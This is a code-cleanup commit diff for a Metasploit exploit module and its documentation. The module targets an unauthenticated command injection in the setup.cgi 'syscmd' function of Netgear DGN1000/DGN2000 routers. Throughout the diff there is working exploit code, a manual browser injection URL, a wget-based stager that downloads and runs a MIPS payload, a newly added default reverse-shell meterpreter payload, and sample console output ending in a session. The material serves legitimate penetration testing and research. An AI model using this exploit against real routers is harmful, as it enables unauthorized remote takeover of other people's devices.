netgear1000dng cleanup

Author: h00die

documentation/modules/exploit/linux/http/netgear_dgn1000_unauth_setup_exec.md renamed to documentation/modules/exploit/linux/http/netgear_dgn1000_setup_unauth_exec.md

@@ -1,4 +1,4 @@
-The module netgear_dgn1000_setup_unauth_exec module exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/&currentsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
+The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/&currentsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
 
 ## Vulnerable Application
 
@@ -8,16 +8,17 @@ Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models
 
   1. Start msfconsole
   2. Do : `use exploit/linux/http/netgear_dgn1000_setup_unauth_exec`
-  3. Do : `set RHOST <RouterIP>`
-  4. Do : `set PAYLOAD <payload>`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set PAYLOAD [payload]`
   5. Do : `run`
   6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
 
 ## Scenarious
 
 Sample output of a successfull exploitation should be look like this :
 
-```msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
+```
+msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
 msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
 RHOST => 192.168.0.1
 msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
@@ -46,3 +47,5 @@ OS           :  (Linux 2.6.20-Amazon_SE)
 Architecture : mips
 Meterpreter  : mipsbe/linux
 meterpreter >
+```
+

modules/exploits/linux/http/netgear_dgn1000_setup_unauth_exec.rb

@@ -21,77 +21,74 @@ def initialize(info = {})
         'Mumbai <https://github.com/realoriginal>', # module
         'Robort Palerie <[email protected]>' # vuln discovery
       ],
-      'References' =>
-        [
+      'References' => [
           ['EDB', '25978'],
       ],
       'DisclosureDate' => 'Jun 5 2013',
       'License' => MSF_LICENSE,
       'Platform' => 'linux',
       'Arch' => ARCH_MIPSBE,
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
+      },
       'Privileged' => true,
       'Payload' => {
         'DisableNops' => true,
       },
-      'Targets'        =>
-        [
-          [ 'Automatic', {} ]
-        ],
-      ))
-
-    end
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+  end
 
-    def check
-      begin
-        res = send_request_cgi({
-          'uri' => '/setup.cgi',
-          'method' => 'GET'
-          })
-          if res && res.headers['WWW-Authenticate']
-            auth = res.headers['WWW-Authenticate']
-            if auth =~ /DGN1000/
-              return Exploit::CheckCode::Detected
-            end
-          end
-         rescue ::Rex::ConnectionError
-           return Exploit::CheckCode::Unknown
-         end
-
-
-        Exploit::CheckCode::Unknown
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/setup.cgi',
+        'method' => 'GET'
+        })
+      if res && res.headers['WWW-Authenticate']
+        auth = res.headers['WWW-Authenticate']
+        if auth =~ /DGN1000/
+          return Exploit::CheckCode::Detected
+        end
       end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+    Exploit::CheckCode::Unknown
+  end
 
-      def exploit
-        print_status("#{peer} - Connecting to target...")
+  def exploit
+    print_status("#{peer} - Connecting to target...")
 
-        unless check == Exploit::CheckCode::Detected
-          fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
-        end
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
+    end
 
-        print_status("#{peer} - Exploiting target ....")
-        execute_cmdstager(
-          :flavor => :wget,
-          :linemax => 200,
-          :concat_operator => " && "
-        )
-      end
+    print_status("#{peer} - Exploiting target ....")
+    execute_cmdstager(
+      :flavor => :wget,
+      :linemax => 200,
+      :concat_operator => " && "
+    )
+  end
 
-      def execute_command(cmd, opts)
-        begin
-          res = send_request_cgi({
-            'uri' => '/setup.cgi',
-            'method' => 'GET',
-            'vars_get' => {
-              'next_file' => 'netgear.cfg',
-              'todo' => 'syscmd',
-              'cmd' => cmd.to_s,
-              'curpath' => '/',
-              'currentsetting.htm' => '1'
-            }
-          })
-          return res
-        rescue ::Rex::ConnectionError
-          fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-        end
-      end
+  def execute_command(cmd, opts)
+    begin
+      res = send_request_cgi({
+        'uri' => '/setup.cgi',
+        'method' => 'GET',
+        'vars_get' => {
+          'next_file' => 'netgear.cfg',
+          'todo' => 'syscmd',
+          'cmd' => cmd.to_s,
+          'curpath' => '/',
+          'currentsetting.htm' => '1'
+        }
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
+  end
+end